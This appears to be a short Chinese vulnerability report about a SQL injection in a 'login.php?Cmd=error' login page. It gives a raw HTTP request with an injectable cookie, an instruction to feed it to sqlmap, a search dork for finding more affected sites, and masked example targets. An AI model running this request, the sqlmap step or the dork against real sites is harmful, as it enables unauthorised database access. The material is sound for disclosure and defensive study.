### 简要描述:
RT
### 详细说明:
```
GET /login.php?Cmd=error&Code=-1&Lang= HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: domain=admin; Hm_lvt_44f9b083c78d9d3c1e736e5ae3a4aff8=1442311545; PHPSESSID=81ooh6cslbmb1uple6k6rlaad1; LoginDomain=**.**.**.**#
X-Forwarded-For: **.**.**.**
X-Remote-Addr: **.**.**.**
X-Originating-IP: **.**.**.**
X-Remote-IP: **.**.**.**
```
保存为1.txt,然后sqlmap -r 1.txt
[<img src="https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png)
### 漏洞证明:
根据关键字查找inurl:login.php?Cmd=error
提供三个案例。其他的并没有一一进行测试
http://**.**.**.**/login.php?Cmd=error&Code=-1
http://**.**.**.**/login.php?Cmd=error&Code=-3&Lang=
http://**.**.**.**/login.php?Cmd=error&Code=-3
[<img src="https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png)
http://**.**.**.**/login.php?Cmd=error&Code=-1
[<img src="https://images.seebug.org/upload/201510/1513464400c6077faced4f302f99aff2e18bf274.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1513464400c6077faced4f302f99aff2e18bf274.png)
[<img src="https://images.seebug.org/upload/201510/15141603407624a38bd1e4e3fb8dbab192879d93.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15141603407624a38bd1e4e3fb8dbab192879d93.png)
京公网安备 11010502034610号
暂无评论